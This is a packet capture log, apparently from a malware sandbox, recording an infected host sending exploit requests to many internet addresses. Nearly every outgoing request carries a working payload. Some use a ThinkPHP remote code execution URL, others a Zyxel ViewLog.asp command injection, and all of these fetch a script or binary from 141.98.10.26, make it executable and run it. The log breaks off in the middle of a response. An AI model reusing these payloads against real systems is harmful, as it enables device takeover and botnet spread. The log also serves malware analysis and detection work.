Nov 22, 2023 08:38:02.003526926 CET	1539	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.23	60968	112.175.13.145	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.575875998 CET	1508	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:02.450217962 CET	1613	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:04.209970951 CET	1768	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:07.889472008 CET	2219	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:15.056451082 CET	3045	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:29.134464979 CET	4732	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:57.290513992 CET	8190	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.23	41700	112.166.64.200	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.589353085 CET	1509	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.23	52326	112.126.147.161	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.602638960 CET	1511	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:01.917538881 CET	1537	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:31:23 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.23	39986	112.124.101.124	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.608499050 CET	1511	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:01.941066027 CET	1538	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Thu, 22 Nov 2012 07:37:59 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.23	38506	112.26.238.55	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:01.647047043 CET	1512	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:02.012763023 CET	1540	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 22 Nov 2023 07:38:01 GMT Server: WS CDN Server Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.23	36970	88.210.101.108	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.088586092 CET	1541	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:02.332535982 CET	1551	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 06:41:16 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.23	32978	31.49.84.180	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.602329016 CET	1625	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:02.786292076 CET	1630	IN	HTTP/1.1 404 Not Found Content-Type: text/html X-Frame-Options: SAMEORIGIN Content-Length: 341 Connection: close Date: Wed, 22 Nov 2023 07:37:55 GMT Server: lighttpd/1.4.55 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.23	58830	95.67.68.206	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.611394882 CET	1626	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.23	49160	94.120.51.174	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.627985001 CET	1627	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.23	58480	31.44.138.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.633579016 CET	1627	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.23	55180	85.122.206.149	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.636630058 CET	1628	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.23	45932	31.136.255.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:02.788141966 CET	1630	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:03.378142118 CET	1690	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:04.529988050 CET	1802	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:06.865591049 CET	2095	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:11.472959995 CET	2613	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:20.687660933 CET	3767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.861082077 CET	5925	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:15.719986916 CET	10472	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.23	38340	88.221.231.244	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:03.499480009 CET	1700	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:03.695591927 CET	1763	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:03 GMT Date: Wed, 22 Nov 2023 07:38:03 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 30 63 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 36 38 33 26 23 34 36 3b 31 31 65 34 32 30 33 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid 